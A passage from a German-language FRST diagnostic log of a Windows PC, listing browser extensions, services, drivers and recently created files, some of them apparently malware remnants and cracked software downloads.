(x86)\Java\jre7\bin\plugin2\npjp2.dll [2013-10-08] (Oracle Corporation) FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.40728.0\npctrl.dll [2015-07-28] ( Microsoft Corporation) FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2013-10-23] (NVIDIA Corporation) FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2013-10-23] (NVIDIA Corporation) FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.28.15\npGoogleUpdate3.dll [2015-09-16] (Google Inc.) FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.28.15\npGoogleUpdate3.dll [2015-09-16] (Google Inc.) FF Plugin-x32: @videolan.org/vlc,version=2.1.0 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2013-09-23] (VideoLAN) FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2015-06-29] (Adobe Systems Inc.) 
FF Extension: Cliqz - C:\Users\Kenny G\AppData\Roaming\Mozilla\Firefox\Profiles\8natfymg.default\Extensions\cliqz@cliqz.com.xpi [2014-11-08]
FF Extension: Adblock Plus - C:\Users\Kenny G\AppData\Roaming\Mozilla\Firefox\Profiles\8natfymg.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2014-03-22]
FF HKLM\...\Thunderbird\Extensions: [eplgTb@eset.com] - C:\Program Files\ESET\ESET Smart Security\Mozilla Thunderbird
FF HKLM-x32\...\Firefox\Extensions: [ffpwdman@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender\Antispam32\ffpwdman
FF HKLM-x32\...\Thunderbird\Extensions: [eplgTb@eset.com] - C:\Program Files\ESET\ESET Smart Security\Mozilla Thunderbird
FF HKU\S-1-5-21-682121585-3582832733-1082443493-1000\...\Firefox\Extensions: [cliqz@cliqz.com] - C:\Users\Kenny G\AppData\Roaming\Mozilla\Firefox\Profiles\8natfymg.default\extensions\cliqz@cliqz.com

Chrome:
=======
CHR StartupUrls: Profile 2 -> "hxxps://www.google.de/"
CHR Profile: C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Docs) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2014-02-16]
CHR Extension: (Google Drive) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-02-16]
CHR Extension: (YouTube) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2014-02-16]
CHR Extension: (Bitdefender Wallet) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Default\Extensions\ccahoghmggldkcdjiebjkidpfongdfbl [2014-02-16]
CHR Extension: (Google Search) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2014-02-16]
CHR Extension: (Google Wallet) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-02-16]
CHR Extension: (Gmail) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2014-02-16]
CHR Profile: C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 1
CHR Extension: (Store) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-09-15]
CHR Extension: (Store) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\ccahoghmggldkcdjiebjkidpfongdfbl [2014-06-26]
CHR Extension: (Google Wallet) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-06-26]
CHR Profile: C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2
CHR Extension: (Google Präsentationen) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2014-10-03]
CHR Extension: (Google Docs) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\aohghmighlieiainnegkcijnfilokake [2014-10-03]
CHR Extension: (Google Drive) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-10-03]
CHR Extension: (YouTube) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2014-10-03]
CHR Extension: (Google-Suche) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2014-10-03]
CHR Extension: (ZenMate Security, Privacy & Unblock VPN) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\fdcgdnkidjaadafnichfpabhfomcebme [2015-07-27]
CHR Extension: (Google Tabellen) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2014-10-03]
CHR Extension: (Google Text & Tabellen Offline) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2015-09-18]
CHR Extension: (Chrome Hotword Shared Module) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\lccekmodgklaepjeofjdjpbminllajkg [2015-03-26]
CHR Extension: (Chrome Web Store-Zahlungen) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-10-03]
CHR Extension: (Google Mail) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2014-10-03]
CHR HKLM-x32\...\Chrome\Extension: [ccahoghmggldkcdjiebjkidpfongdfbl] - <kein Path/update_url>

==================== Dienste (Nicht auf der Ausnahmeliste) ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 avgfws; C:\Program Files (x86)\AVG\AVG2015\avgfws.exe [1560592 2015-08-24] (AVG Technologies CZ, s.r.o.)
S2 AVGIDSAgent; C:\Program Files (x86)\AVG\AVG2015\avgidsagent.exe [3637160 2015-08-24] (AVG Technologies CZ, s.r.o.)
R2 avgwd; C:\Program Files (x86)\AVG\AVG2015\avgwdsvc.exe [335656 2015-08-24] (AVG Technologies CZ, s.r.o.)
S2 CGVPNCliService; C:\Program Files\CyberGhost 5\Service.exe [63968 2015-05-21] (CyberGhost S.R.L)
R3 Disc Soft Lite Bus Service; C:\Program Files\DAEMON Tools Lite\DiscSoftBusService.exe [1268568 2015-06-18] (Disc Soft Ltd)
S2 MBAMService; C:\Program Files (x86)\ Malwarebytes Anti-Malware \mbamservice.exe [1133880 2015-06-18] (Malwarebytes Corporation)
R2 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe [15122208 2013-10-18] (NVIDIA Corporation)
R2 PnkBstrA; C:\Windows\SysWOW64\PnkBstrA.exe [76888 2014-01-15] ()
R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2009-07-14] (Microsoft Corporation)
R2 WtuSystemSupport; C:\Program Files (x86)\AVG Web TuneUp\WtuSystemSupport.exe [1205136 2015-08-26] ()
S2 LavasoftTcpService; C:\Program Files (x86)\Lavasoft\Web Companion\TcpService\2.3.4.7\LavasoftTcpService.exe [X]
S2 SearchProtectionService; C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.SearchProtect.WinService.exe [X]
R2 zuroluxy; C:\Program Files (x86)\Could not connect. Error code = 0x-1442657579---\knsl4AC.tmpfs [X]

===================== Treiber (Nicht auf der Ausnahmeliste) ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R1 Avgdiska; C:\Windows\System32\DRIVERS\avgdiska.sys [162784 2015-03-11] (AVG Technologies CZ, s.r.o.)
R1 Avgfwfd; C:\Windows\System32\DRIVERS\avgfwd6a.sys [77760 2015-07-09] (AVG Technologies CZ, s.r.o.)
R1 AVGIDSDriver; C:\Windows\System32\DRIVERS\avgidsdrivera.sys [313264 2015-08-19] (AVG Technologies CZ, s.r.o.)
R0 AVGIDSHA; C:\Windows\System32\DRIVERS\avgidsha.sys [297904 2015-08-19] (AVG Technologies CZ, s.r.o.)
R1 Avgldx64; C:\Windows\System32\DRIVERS\avgldx64.sys [259040 2015-06-16] (AVG Technologies CZ, s.r.o.)
R0 Avgloga; C:\Windows\System32\DRIVERS\avgloga.sys [378336 2015-05-07] (AVG Technologies CZ, s.r.o.)
R0 Avgmfx64; C:\Windows\System32\DRIVERS\avgmfx64.sys [250800 2015-08-04] (AVG Technologies CZ, s.r.o.)
R0 Avgrkx64; C:\Windows\System32\DRIVERS\avgrkx64.sys [40928 2015-03-20] (AVG Technologies CZ, s.r.o.)
R1 Avgtdia; C:\Windows\System32\DRIVERS\avgtdia.sys [300464 2015-08-04] (AVG Technologies CZ, s.r.o.)
R1 cbfs3; C:\Windows\system32\drivers\cbfs3.sys [352144 2012-04-09] (EldoS Corporation)
R3 dtlitescsibus; C:\Windows\System32\DRIVERS\dtlitescsibus.sys [30264 2015-09-19] (Disc Soft Ltd)
S3 ebdrv; C:\Windows\system32\DRIVERS\evbda.sys [3286016 2009-06-10] (Broadcom Corporation)
R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2015-06-18] (Malwarebytes Corporation)
S3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [63704 2015-06-18] (Malwarebytes Corporation)
R3 MTsensor; C:\Windows\System32\DRIVERS\ASACPI.sys [8192 2005-03-29] ()
R3 nvvad_WaveExtensible; C:\Windows\System32\drivers\nvvad64v.sys [39200 2013-09-28] (NVIDIA Corporation)
R0 SI3132; C:\Windows\System32\DRIVERS\SI3132.sys [90664 2007-10-03] (Silicon Image, Inc)
R0 SiFilter; C:\Windows\System32\DRIVERS\SiWinAcc.sys [22056 2007-10-03] (Silicon Image, Inc)
R0 SiRemFil; C:\Windows\System32\DRIVERS\SiRemFil.sys [17448 2007-10-03] (Silicon Image, Inc)
U3 fwdiipog; \??\C:\Users\KENNYG~1\AppData\Local\Temp\fwdiipog.sys [X]

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Ein Monat: Erstellte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2015-09-20 19:29 - 2015-09-20 19:30 - 00032570 _____ C:\Users\Kenny G\Desktop\GMER.txt
2015-09-20 19:19 - 2015-09-20 19:19 - 00380416 _____ C:\Users\Kenny G\Downloads\Gmer-19357.exe
2015-09-20 19:17 - 2015-09-20 19:17 - 00045165 _____ C:\Users\Kenny G\Downloads\Addition.txt
2015-09-20 19:16 - 2015-09-20 19:34 - 00019125 _____ C:\Users\Kenny G\Downloads\FRST.txt
2015-09-20 19:15 - 2015-09-20 19:34 - 00000000 ____D C:\FRST
2015-09-20 19:14 - 2015-09-20 19:15 - 02191360 _____ (Farbar) C:\Users\Kenny G\Downloads\FRST64.exe
2015-09-20 19:14 - 2015-09-20 19:14 - 00000476 _____ C:\Users\Kenny G\Downloads\defogger_disable.log
2015-09-20 19:14 - 2015-09-20 19:14 - 00000000 _____ C:\Users\Kenny G\defogger_reenable
2015-09-20 19:13 - 2015-09-20 19:13 - 00050477 _____ C:\Users\Kenny G\Downloads\Defogger.exe
2015-09-20 19:07 - 2015-09-20 19:07 - 00000000 ____D C:\Users\Kenny G\Desktop\Festplatte
2015-09-20 19:00 - 2015-09-20 19:00 - 03237248 _____ (Enigma Software Group USA, LLC.) C:\Users\Kenny G\Downloads\SpyHunter-Installer.exe
2015-09-20 18:19 - 2015-09-20 18:19 - 00004680 _____ C:\Users\Kenny G\Desktop\JRT.txt
2015-09-20 18:00 - 2015-09-20 18:00 - 01798976 _____ (Malwarebytes) C:\Users\Kenny G\Downloads\JRT.exe
2015-09-20 17:43 - 2015-09-20 18:26 - 00113880 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2015-09-20 17:42 - 2015-09-20 17:42 - 00001157 _____ C:\Users\Public\Desktop\ Malwarebytes Anti-Malware .lnk
2015-09-20 17:42 - 2015-09-20 17:42 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ Malwarebytes Anti-Malware
2015-09-20 17:42 - 2015-09-20 17:42 - 00000000 ____D C:\Program Files (x86)\ Malwarebytes Anti-Malware
2015-09-20 17:42 - 2015-06-18 08:41 - 00109272 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2015-09-20 17:42 - 2015-06-18 08:41 - 00063704 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2015-09-20 17:42 - 2015-06-18 08:41 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2015-09-20 17:36 - 2015-09-20 17:38 - 24345872 _____ (Malwarebytes Corporation ) C:\Users\Kenny G\Downloads\mbam-setup-2.1.8.1057.exe
2015-09-20 17:36 - 2015-09-20 17:37 - 01662976 _____ C:\Users\Kenny G\Downloads\AdwCleaner_5.008.exe
2015-09-20 17:31 - 2015-09-20 17:31 - 05635119 _____ (Swearware) C:\Users\Kenny G\Downloads\ComboFix.exe
2015-09-19 17:25 - 2015-09-19 17:25 - 00000000 ____D C:\Users\Kenny G\Documents\Simply Super Software
2015-09-19 17:25 - 2015-09-19 17:25 - 00000000 ____D C:\Users\Kenny G\AppData\Roaming\Simply Super Software
2015-09-19 17:25 - 2015-09-19 17:25 - 00000000 ____D C:\ProgramData\Simply Super Software
2015-09-19 17:25 - 2015-09-19 17:25 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Trojan Remover
2015-09-19 17:25 - 2015-09-19 17:25 - 00000000 ____D C:\Program Files (x86)\Trojan Remover
2015-09-19 17:14 - 2015-09-19 17:15 - 01457952 _____ C:\Users\Kenny G\Downloads\Trojan Remover - CHIP-Installer.exe
2015-09-19 17:11 - 2015-09-20 17:29 - 00000584 _____ C:\task.vbs
2015-09-19 16:17 - 2015-09-19 16:48 - 00000000 ____D C:\Windows\system32\MRT
2015-09-19 16:16 - 2015-09-19 16:16 - 00000000 ____D C:\Windows\system32\EventProviders
2015-09-19 16:02 - 2015-07-29 09:23 - 00000000 ____D C:\Users\Kenny G\Desktop\Steuerungs- und Regeltechnik
2015-09-19 15:37 - 2015-09-19 15:37 - 00001494 _____ C:\Users\Kenny G\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2015-09-19 12:25 - 2015-09-19 12:25 - 00000000 __RHD C:\MSOCache
2015-09-19 12:24 - 2015-09-19 12:24 - 00000000 ____D C:\Users\Kenny G\AppData\Local\Disc_Soft_Ltd
2015-09-19 12:21 - 2015-09-19 12:24 - 00000000 ____D C:\Users\Kenny G\AppData\Roaming\DAEMON Tools Lite
2015-09-19 12:21 - 2015-09-19 12:23 - 00000000 ____D C:\Program Files\DAEMON Tools Lite
2015-09-19 12:21 - 2015-09-19 12:21 - 00030264 _____ (Disc Soft Ltd) C:\Windows\system32\Drivers\dtlitescsibus.sys
2015-09-19 12:21 - 2015-09-19 12:21 - 00000000 ____D C:\ProgramData\DAEMON Tools Lite
2015-09-19 12:15 - 2015-09-19 12:15 - 00000000 ____D C:\Users\Kenny G\AppData\Local\Could not connect. Error code = 0x-1442664913---
2015-09-19 12:14 - 2009-06-10 23:00 - 00000824 _____ C:\Windows\system32\Drivers\etc\hp.bak
2015-09-19 12:12 - 2015-09-20 01:26 - 00000000 ____D C:\Program Files (x86)\Could not connect. Error code = 0x-1442657579---
2015-09-19 12:06 - 2015-09-19 12:12 - 00000000 ____D C:\ProgramData\Microsoft Toolkit
2015-09-19 11:42 - 2015-09-19 15:43 - 00000000 ____D C:\Users\Kenny G\Desktop\Neuer Ordner (3)
2015-09-19 11:35 - 2015-09-19 11:38 - 55791130 _____ C:\Users\Kenny G\Downloads\MS-PowerPoint-2013-ISO-and-Activator.zip
2015-09-19 11:07 - 2015-09-19 11:07 - 00000000 ____D C:\Windows\System32\Tasks\OfficeSoftwareProtectionPlatform
2015-09-19 11:06 - 2015-09-19 16:06 - 00000000 ____D C:\ProgramData\Microsoft Help
2015-09-19 11:06 - 2015-09-19 11:06 - 00000000 ____D C:\Users\Kenny G\AppData\Local\Microsoft Help
2015-09-13 21:57 - 2015-09-13 22:26 - 00000000 ____D C:\Users\Kenny G\Desktop\USB Lieder
2015-09-13 12:25 - 2015-09-13 12:30 - 327964808 _____ (Microsoft Corporation) C:\Users\Kenny G\Downloads\X16-32694.exe
2015-09-01 22:40 - 2015-09-01 22:40 - 00001666 _____ C:\Users\Kenny G\Desktop\Traktor.exe - Verknüpfung.lnk
2015-09-01 21:50 - 2015-09-01 21:58 - 241712938 _____ C:\Users\Kenny G\Downloads\Traktor_2_290_PC.zip
2015-09-01 21:43 - 2015-09-01 21:43 - 01260832 _____ C:\Users\Kenny G\Downloads\Traktor Pro 2 - CHIP-Installer.exe
2015-09-01 20:31 - 2015-09-01 20:31 - 00000000 ____D C:\Backup
2015-09-01 20:20 - 2015-08-07 22:21 - 00000000 ____D C:\Users\Kenny G\Desktop\Native.Instruments.TRAKTOR.2.v2.9.0.x86.x64-CHAOS
2015-08-31 23:34 - 2015-09-01 20:19 - 527315694 _____ C:\Users\Kenny G\Downloads\2.9.0.x86.x64-CHAOS.rar
2015-08-29 20:49 - 2015-08-29 20:49 - 00000000 _____ C:\Windows\setuperr.log
2015-08-29 20:33 - 2015-08-29 20:34 - 00000000 ____D C:\ProgramData\Package Cache
2015-08-29 19:48 - 2015-09-19 11:54 - 00000000 ____D C:\Users\Kenny G\Desktop\Alles
2015-08-29 16:06 - 2015-08-30 01:38 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2015-08-29 15:56 - 2015-09-01 22:33 - 00143270 _____ C:\Windows\DPINST.LOG

==================== Ein Monat: Geänderte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2015-09-20 19:30 - 2013-10-01 21:23 - 01080796 _____ C:\Windows\WindowsUpdate.log
2015-09-20 19:24 - 2015-05-19 19:27 - 00001110 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA1d0925912f22c70.job
2015-09-20 19:16 - 2015-06-01 12:52 - 00000000 ____D C:\ProgramData\MFAData
2015-09-20 19:14 - 2013-10-01 21:24 - 00000000 ____D C:\Users\Kenny G
2015-09-20 18:28 - 2009-07-14 06:45 - 00014016 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2015-09-20 18:28 - 2009-07-14 06:45 - 00014016 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2015-09-20 18:24 - 2015-05-19 19:27 - 00001106 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore1d0925912504720.job
2015-09-20 18:23 - 2015-08-07 13:40 - 00025668 _____ C:\Windows\PFRO.log
2015-09-20 18:23 - 2015-07-28 07:45 - 00018460 _____ C:\Windows\setupact.log
2015-09-20 18:23 - 2013-11-03 19:09 - 00000000 ____D C:\ProgramData\NVIDIA
2015-09-20 18:23 - 2009-07-14 07:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2015-09-20 18:21 - 2015-06-01 11:16 - 00000000 ____D C:\AdwCleaner
2015-09-20 18:07 - 2015-08-07 11:34 - 00000000 ____D C:\Users\Kenny G\AppData\Roaming\Lavasoft
2015-09-20 18:07 - 2015-08-07 11:33 - 00000000 ____D C:\ProgramData\Lavasoft
2015-09-20 18:07 - 2015-08-07 11:33 - 00000000 ____D C:\Program Files (x86)\Lavasoft
2015-09-20 03:16 - 2013-10-02 12:15 - 00000000 ____D C:\Users\Kenny G\AppData\Roaming\vlc
2015-09-19 18:33 - 2013-10-03 21:25 - 00000000 ____D C:\Users\Kenny G\AppData\Roaming\Skype
2015-09-19 17:16 - 2015-07-27 22:57 - 00068936 _____ C:\Users\Kenny G\AppData\Local\GDIPFONTCACHEV1.DAT
2015-09-19 16:39 - 2015-07-28 07:44 - 00317968 _____ C:\Windows\system32\FNTCACHE.DAT
2015-09-19 16:38 - 2015-05-12 22:45 - 00000000 ____D C:\Program Files\Microsoft Silverlight
2015-09-19 16:38 - 2015-05-12 22:45 - 00000000 ____D C:\Program Files (x86)\Microsoft Silverlight
2015-09-19 16:35 - 2015-05-12 22:46 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight
2015-09-19 16:07 - 2015-08-07 11:38 - 00003848 _____ C:\Windows\System32\Tasks\Opera scheduled Autoupdate 1438940281
2015-09-19 16:07 - 2015-08-07 11:37 - 00000000 ____D C:\Program Files (x86)\Opera
2015-09-19 16:06 - 2009-07-14 05:20 - 00000000 ____D C:\Program Files\Common Files\Microsoft Shared
2015-09-19 15:37 - 2015-06-02 08:55 - 00000000 ____D C:\ProgramData\AVG2015
2015-09-19 15:37 - 2013-10-01 21:25 - 00001442 _____ C:\Users\Kenny G\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer (64-bit).lnk
2015-09-19 11:54 - 2014-11-11 21:45 - 00000000 ____D C:\Users\Kenny G\Desktop\schule
2015-09-19 11:17 - 2009-07-14 20:18 - 00000000 ____D C:\Windows\ShellNew
2015-09-16 20:19 - 2015-05-19 19:27 - 00004106 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA1d0925912f22c70
2015-09-16 20:19 - 2015-05-19 19:27 - 00003854 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore1d0925912504720
2015-09-12 12:16 - 2014-01-15 20:58 - 00282296 _____ C:\Windows\SysWOW64\PnkBstrB.xtr
2015-09-12 12:16 - 2014-01-15 20:58 - 00282296 _____ C:\Windows\SysWOW64\PnkBstrB.exe
2015-09-12 12:14 - 2014-01-15 20:58 - 00215128 _____ C:\Windows\SysWOW64\PnkBstrB.ex0
2015-09-12 12:14 - 2013-12-08 04:01 - 00000000 ____D C:\Program Files (x86)\Steam
2015-09-09 10:54 - 2014-02-17 11:46 - 00000000 ____D C:\Users\Tabea Studium
2015-09-09 10:54 - 2013-12-14 00:05 - 00000000 ____D C:\Users\eLoot
2015-09-03 13:45 - 2013-10-26 19:41 - 00305664 ___SH C:\Users\Kenny G\Documents\Thumbs.db
2015-09-03 13:43 - 2015-08-13 02:23 - 00000946 _____ C:\Windows\Tasks\Adobe Flash Player PPAPI Notifier.job
2015-09-03 13:43 - 2015-02-10 17:45 - 00001110 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA1d0454889312e80.job
2015-09-03 13:43 - 2015-02-10 17:45 - 00001106 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore1d04548885af2c0.job
2015-09-03 13:43 - 2014-11-14 16:21 - 00001110 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA1d00016545d4e90.job
2015-09-03 13:43 - 2014-02-16 13:52 - 00001110 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2015-09-03 13:43 - 2014-02-16 13:52 - 00001106 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2015-09-02 22:17 - 2015-06-01 12:10 - 00003206 _____ C:\Windows\System32\Tasks\{AFE2C666-2C4F-49BB-B86B-2CC7B241F441}
2015-09-02 22:17 - 2015-02-10 17:45 - 00004118 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA1d0454889312e80
2015-09-02 22:16 - 2015-08-13 02:23 - 00003948 _____ C:\Windows\System32\Tasks\Adobe Flash Player PPAPI Notifier
2015-09-02 22:16 - 2015-02-10 17:45 - 00003866 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore1d04548885af2c0
2015-09-02 22:16 - 2014-11-14 16:21 - 00004118 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA1d00016545d4e90
2015-09-02 22:16 - 2014-02-16 13:52 - 00004118 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2015-09-02 22:16 - 2014-02-16 13:52 - 00003866 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2015-09-02 22:16 - 2014-02-16 03:10 - 00003300 _____ C:\Windows\System32\Tasks\{7AD56248-245F-4D20-B2FB-3A38DD4D9679}
2015-09-02 22:16 - 2013-10-01 22:01 - 00002778 _____ C:\Windows\System32\Tasks\CCleanerSkipUAC
2015-09-01 22:34 - 2015-08-14 11:07 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Native Instruments
2015-09-01 22:33 - 2015-08-14 11:07 - 00000000 ____D C:\Program Files\Native Instruments
2015-09-01 22:24 - 2015-08-14 11:07 - 00000000 ____D C:\Program Files\Common Files\Native Instruments
2015-09-01 22:17 - 2015-08-08 00:13 - 00000000 ____D C:\Users\Kenny G\Documents\Native Instruments
2015-08-30 01:38 - 2013-12-04 21:27 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2015-08-29 20:01 - 2014-06-19 18:04 - 00000000 ____D C:\Users\Kenny G\.thumbnails
2015-08-29 20:01 - 2009-10-14 08:04 - 00000000 ____D C:\Windows\Panther
2015-08-29 19:56 - 2015-07-20 21:25 - 00000995 _____ C:\Users\Kenny G\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Start Tor Browser.lnk
2015-08-29 15:58 - 2015-08-14 11:07 - 00000000 ____D C:\ProgramData\Native Instruments
2015-08-29 09:26 - 2015-06-02 08:56 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG
2015-08-29 03:35 - 2009-07-14 05:20 - 00000000 ____D C:\Windows\system32\NDF
2015-08-26 18:37 - 2009-10-14 07:12 - 134753440 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2015-08-26 11:33 - 2015-06-02 09:01 - 00000000 ____D C:\Program Files (x86)\AVG Web TuneUp

==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse =======

2010-06-02 06:21 - 2010-06-02 06:21 - 1347354 _____ () C:\Program Files (x86)\Apr2005_d3dx9_25_x64.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 1078962 _____ () C:\Program Files (x86)\Apr2005_d3dx9_25_x86.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 1397830 _____ () C:\Program Files (x86)\Apr2006_d3dx9_30_x64.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 1115221 _____ () C:\Program Files (x86)\Apr2006_d3dx9_30_x86.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0916430 _____ () C:\Program Files (x86)\Apr2006_MDX1_x86.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 4162630 _____ () C:\Program Files (x86)\Apr2006_MDX1_x86_Archive.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0179133 _____ () C:\Program Files (x86)\Apr2006_XACT_x64.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0133103 _____ () C:\Program Files (x86)\Apr2006_XACT_x86.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0087101 _____ () C:\Program Files
(x86)\Apr2006_xinput_x64.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0046010 _____ () C:\Program Files (x86)\Apr2006_xinput_x86.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0698612 _____ () C:\Program Files (x86)\APR2007_d3dx10_33_x64.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0695865 _____ () C:\Program Files (x86)\APR2007_d3dx10_33_x86.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 1607358 _____ () C:\Program Files (x86)\APR2007_d3dx9_33_x64.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 1606039 _____ () C:\Program Files (x86)\APR2007_d3dx9_33_x86.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0195766 _____ () C:\Program Files (x86)\APR2007_XACT_x64.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0151225 _____ () C:\Program Files (x86)\APR2007_XACT_x86.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0096817 _____ () C:\Program Files (x86)\APR2007_xinput_x64.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0053302 _____ () C:\Program Files (x86)\APR2007_xinput_x86.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 1350542 _____ () C:\Program Files (x86)\Aug2005_d3dx9_27_x64.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 1077644 _____ () C:\Program Files (x86)\Aug2005_d3dx9_27_x86.cab
